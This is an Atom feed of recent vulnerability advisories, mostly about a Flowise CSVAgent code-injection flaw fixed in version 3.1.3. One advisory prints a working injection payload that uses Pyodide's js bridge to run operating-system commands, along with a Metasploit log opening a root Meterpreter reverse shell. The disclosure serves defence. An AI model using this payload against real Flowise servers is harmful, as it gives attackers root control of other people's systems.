<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-02T19:30:52.576462+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-344250</id>
    <title>EUVD-2026-344250</title>
    <updated>2026-10-02T19:30:52.621267+00:00</updated>
    <content>EUVD-2026-344250</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-344250"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-69255</id>
    <title>fkie_cve-2026-69255</title>
    <updated>2026-10-02T19:30:52.621301+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the CSVAgent in packages/components/nodes/agents/CSVAgent/CSVAgent.ts extracted attacker-controlled CSV data with file.split(',').pop() and interpolated it directly into executable Python as base64_string = "${base64String}" before calling Pyodide. The validatePythonCodeForDataFrame() denylist only checked later LLM-generated code and did not validate this initial code block. An authenticated attacker could inject a closing quote followed by Python code, use Pyodide's js bridge to load Node.js child_process, and execute arbitrary operating system commands as root in the Flowise container. This issue is fixed in version 3.1.3.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-69255"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-vmv7-4m6c-3cg5</id>
    <title>GHSA-vmv7-4m6c-3cg5 — Flowise: CSV Agent Remote Code Execution via Pyodide Code Injection — Root Shell Verified</title>
    <updated>2026-10-02T19:30:52.621336+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: flowise, npm: flowise-components</p>
<p>## UPDATE 2026-05-20: Full RCE as root VERIFIED</p>
<p>**This is not theoretical — a Meterpreter reverse shell session as root has been established on Flowise 3.1.2.**</p>
<p>### Verified Exploit Chain</p>
<p>1. Python code injection via `base64_string = "${base64String}"` (CSVAgent.ts line 161)
2. Pyodide `js` bridge provides access to the host Node.js process
3. `process.mainModule.constructor._load('child_process')` loads child_process (bypasses ESM require restriction)
4. `.execSync('CMD')` executes arbitrary OS commands as **root** (PID 1 in container)</p>
<p>### Working RCE Payload</p>
<p>```
";import js;e=js.globalThis.eval;e("process.mainModule.constructor._load('child_process').execSync('id')");#
```</p>
<p>**Constraint:** No commas allowed in payload — `csvFile.split(',')` splits on all commas.</p>
<p>### Metasploit Session Proof</p>
<p>```
msf &gt; use exploit/multi/http/flowise_csv_agent_rce
msf &gt; set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
msf &gt; exploit</p>
<p>[+] Authentication successful
[+] Created chatflow: b6716feb-63c8-4fd2-993f-cd43788704b4
[*] Sending stage (3090404 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -&gt; 172.17.0.2:41422)</p>
<p>meterpreter &gt; getuid
Server username: root</p>
<p>meterpreter &gt; sysinfo
Computer     : cbce3fb352b7
OS           : Linux 6.8.0-111-generic
Architecture : x64
Meterpreter  : x64/linux</p>
<p>meterpreter &gt; shell
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)</p>
<p># uname -a
Linux cbce3fb352b7 6.8.0-111-generic x86_64 Linux
```</p>
<p>### Addi…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-vmv7-4m6c-3cg5"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2589</id>
    <title>WID-SEC-W-2026-2589 — Flowise: Mehrere Schwachstellen</title>
    <updated>2026-10-02T19:30:52.621398+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Ein Angreifer kann mehrere Schwachstellen in Flowise ausnutzen, um beliebigen Code auszuführen – sogar mit Root-Rechten –, erweiterte Privilegien zu erlangen, Sicherheitsmaßnahmen zu umgehen, Sitzungen zu kapern sowie Daten offenzulegen oder zu manipulieren.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2589"/>
  </entry>
</feed>
